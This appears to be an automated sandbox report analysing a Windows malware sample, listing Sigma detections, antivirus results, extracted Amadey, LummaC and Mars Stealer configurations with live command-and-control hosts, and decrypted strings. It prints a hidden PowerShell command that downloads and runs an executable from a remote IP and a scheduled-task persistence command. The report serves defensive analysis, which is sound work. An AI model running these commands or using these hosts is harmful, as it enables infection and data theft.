                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: PowerShell Web Download
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: Suspicious Schtasks From Env Var Folder
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7392, ProcessName: schtasks.exe
                                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: Non Interactive PowerShell Process Spawned
                                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 1812, ProcessName: powershell.exe

                                      Data Obfuscation

                                      barindex
                                      Sigma detected: Powershell download and execute file
                                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe

                                      Suricata Signatures

                                      No Suricata rule has matched

                                      Joe Sandbox Signatures

                                      Click to jump to signature section

                                      Show All Signature Results

                                      AV Detection

                                      barindex
                                      Antivirus / Scanner detection for submitted sample
                                      Source: M6gQuZPvgY.exeAvira: detected
                                      Antivirus detection for URL or domain
                                      Source: https://gunrightsp.run:443/bksaHygicrosoftAvira URL Cloud: Label: malware
                                      Source: http://185.215.113.209/Di0Her478/index.php101Avira URL Cloud: Label: malware
                                      Source: https://gunrightsp.run/bksaHyguAvira URL Cloud: Label: malware
                                      Source: https://gunrightsp.run/bksaHyg0Avira URL Cloud: Label: malware
                                      Source: http://185.215.113.209/Di0Her478/index.phpAvira URL Cloud: Label: malware
                                      Source: https://gunrightsp.run/bksaHygAvira URL Cloud: Label: malware
                                      Antivirus detection for dropped file
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exeAvira: detection malicious, Label: TR/Kryptik.jihlg
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeAvira: detection malicious, Label: TR/Crypt.Agent.fdbkv
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeAvira: detection malicious, Label: TR/Redcap.zvzjx
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exeAvira: detection malicious, Label: TR/Kryptik.zivzb
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/AD.PSLoader.wdbmn
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exeAvira: detection malicious, Label: TR/Agent.rdnbz
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                      Found malware configuration
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["codxefusion.top", "hardswarehub.today", "gadgethgfub.icu", "hardrwarehaven.run", "techmindzs.live", "quietswtreams.life", "techspherxe.top"], "Build id": "CRON--@CRONLOGS"}
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackMalware Configuration Extractor: Mars Stealer {"C2 url": "ctrlgem.xyz/gate.php"}
                                      Multi AV Scanner detection for dropped file
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exeReversingLabs: Detection: 47%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exeReversingLabs: Detection: 95%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exeReversingLabs: Detection: 91%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeReversingLabs: Detection: 60%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exeReversingLabs: Detection: 50%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exeReversingLabs: Detection: 84%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\trano1221[1].exeReversingLabs: Detection: 20%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exeReversingLabs: Detection: 25%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exeReversingLabs: Detection: 79%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeReversingLabs: Detection: 81%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeReversingLabs: Detection: 56%
                                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exeReversingLabs: Detection: 16%
                                      Source: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXEReversingLabs: Detection: 61%
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEReversingLabs: Detection: 61%
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeReversingLabs: Detection: 20%
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeReversingLabs: Detection: 95%
                                      Source: C:\Users\user\AppData\Local\Temp\10019520101\dw.exeReversingLabs: Detection: 25%
                                      Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exeReversingLabs: Detection: 16%
                                      Source: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exeReversingLabs: Detection: 50%
                                      Source: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exeReversingLabs: Detection: 91%
                                      Source: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exeReversingLabs: Detection: 79%
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeReversingLabs: Detection: 81%
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeReversingLabs: Detection: 47%
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeReversingLabs: Detection: 84%
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeReversingLabs: Detection: 60%
                                      Source: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exeReversingLabs: Detection: 56%
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeReversingLabs: Detection: 61%
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeReversingLabs: Detection: 81%
                                      Multi AV Scanner detection for submitted file
                                      Source: M6gQuZPvgY.exeVirustotal: Detection: 60%Perma Link
                                      Source: M6gQuZPvgY.exeReversingLabs: Detection: 61%
                                      Joe Sandbox ML detected suspicious sample
                                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                      Sample uses string decryption to hide its real strings
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: codxefusion.top
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: hardswarehub.today
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: gadgethgfub.icu
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: hardrwarehaven.run
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: techmindzs.live
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: quietswtreams.life
                                      Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmpString decryptor: techspherxe.top
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 176.113.115.6
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: /Ni9kiput/index.php
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: S-%lu-
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: bb556cff4a
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapes.exe
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Startup
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: cmd /C RMDIR /s/q
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: rundll32
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Programs
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: %USERPROFILE%
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: cred.dll|clip.dll|
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: cred.dll
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: clip.dll
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: http://
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: https://
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: /quiet
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: /Plugins/
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: &unit=
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: shell32.dll
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: kernel32.dll
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: GetNativeSystemInfo
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: ProgramData\
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: AVAST Software
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Kaspersky Lab
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Panda Security
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Doctor Web
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 360TotalSecurity
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Bitdefender
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Norton
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Sophos
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Comodo
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: WinDefender
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 0123456789
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: ------
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: ?scr=1
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: ComputerName
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: -unicode-
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: VideoID
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: DefaultSettings.XResolution
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: DefaultSettings.YResolution
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: ProductName
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: CurrentBuild
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: rundll32.exe
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: "taskkill /f /im "
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: " && timeout 1 && del
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: && Exit"
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: " && ren
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Powershell.exe
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: -executionpolicy remotesigned -File "
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: shutdown -s -t 0
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: random
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: Keyboard Layout\Preload
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 00000419
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 00000422
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 00000423
                                      Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString decryptor: 0000043f
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LoadLibraryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: LoadLibraryA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetProcAddress
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetProcAddress
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ExitProcess
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ExitProcess
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: advapi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: advapi32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: crypt32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: crypt32.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTickCount
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetTickCount
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Sleep
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: Sleep
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateMutexA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateMutexA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLastError
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetLastError
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HeapAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HeapAlloc
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetProcessHeap
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetProcessHeap
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetComputerNameA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetComputerNameA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: VirtualProtect
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: VirtualProtect
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentProcess
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentProcess
